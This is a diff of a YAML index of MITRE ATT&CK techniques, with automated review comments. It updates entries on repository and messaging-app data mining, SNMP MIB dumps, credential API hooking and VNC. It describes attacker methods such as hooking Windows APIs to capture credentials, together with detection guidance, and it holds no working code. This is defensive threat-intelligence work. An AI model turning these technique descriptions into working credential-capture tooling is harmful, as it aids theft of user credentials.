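Review bot: the removal of `spec_version: '2.1'` in this hunk (repeated for every technique object later in the diff) is a schema change for consumers of this index and should be called out in the PR description; anything that reads that key will lose it silently. The rest of the hunk is key reordering (`x_mitre_contributors`, `x_mitre_platforms`, `x_mitre_is_subtechnique` and `x_mitre_deprecated` move without content change), which buries the two real edits: the description now links `[Unsecured Credentials](https://attack.mitre.org/techniques/T1552)` where it previously said "credentials", and `x_mitre_version` goes from '1.1' to '1.2'. If the generator can emit keys in a stable order, these index diffs would become reviewable.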
@@ -41155,41 +41752,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
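Review bot: the rewritten T1213 description introduces three new citation tokens, `(Citation: Mitiga)`, `(Citation: TrendMicro Exposed Redis 2020)` and `(Citation: Cybernews Reuters Leak 2022)`; each needs an `external_references` entry whose `source_name` matches the token character for character, so confirm all three land in the same change. Two smaller points: the single contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into two, so the Gurucul affiliation now applies only to the second name; and the double-quoted scalar carries trailing spaces before `\n` (for example `(PII) \n\n` and `databases \n*`), which will round-trip into the rendered description. The `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0 on the preceding T1213.003 object is consistent with the `spec_version` removal in the previous hunk.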
@@ -41218,10 +41826,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
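Review bot: this hunk replaces the `Office 365` and `Google Workspace` platforms with a single `Office Suite` entry and bumps `x_mitre_version` from '3.3' to '3.4'. Any derived index keyed on `x_mitre_platforms` (a per-platform CSV, for instance) must be regenerated in the same PR or it will drift from this file. Minor: `Office Suite` is appended after `IaaS` rather than where the removed entries sat, which is harmless but makes the list order look accidental.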
@@ -41234,10 +41841,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
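Review bot: both new reference entries resolve citation tokens used in the updated T1213 description (`Mitiga` and `TrendMicro Exposed Redis 2020`), so the description-to-reference linkage checks out, and they are placed in the existing author-alphabetical order. One nit: the Mitiga entry is dated `(n.d.)` although its `description` names three authors of a blog post with a retrieval date; if this came verbatim from upstream leave it, otherwise a publication date would help.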
@@ -41246,11 +41863,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
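Review bot: the `description` of the new `Cybernews Reuters Leak 2022` entry has a stray space before the period in `Vilius Petkauskas .`. Since this block looks copied from upstream ATT&CK data, the fix belongs upstream rather than in a hand edit of the generated index, but it is worth noting so nobody patches it here. The `source_name` matches the `(Citation: Cybernews Reuters Leak 2022)` token in the description, and the trailing `spec_version` removal follows the same pattern as the other objects in this diff.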
@@ -41287,7 +41907,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
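Review bot: the `modified` timestamp for T1602.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-10-22T01:54:22.812Z`, with no other change to the object in this hunk. A regenerated index should not normally emit an older modification time, so confirm the source dataset is the intended release before merging; any tooling that uses `modified` to detect updated techniques will otherwise read this as a rollback.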
@@ -41319,115 +41939,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
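Review bot: inside the reordering noise for T1056.004 there is one substantive deletion that is easy to miss: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is dropped entirely, alongside the expected `revoked: false`, `x_mitre_deprecated: false`, the version bump '1.0' to '1.1' and the `x_mitre_attack_spec_version` move to 3.2.0. Confirm the permissions removal is intentional and mention it in the PR description. For the new T1213.005 object: `x_mitre_detection: ''` is empty, the description contains an escaped trailing space (`\ \n\n`), and the `Sentinel Labs NullBulge 2024` description begins with a leading space (`" Jim Walter.`); all five citation tokens in the description do have matching `external_references` entries. Also note the inconsistency that T1056.004 keeps an `identifier: T1056.004` key with an empty `atomic_tests: []` while the new T1213.005 gets no `identifier` key at all; if the generator emits `identifier` only under some condition, that condition should be documented.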
@@ -41438,6 +42125,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41447,7 +42135,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41463,66 +42150,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
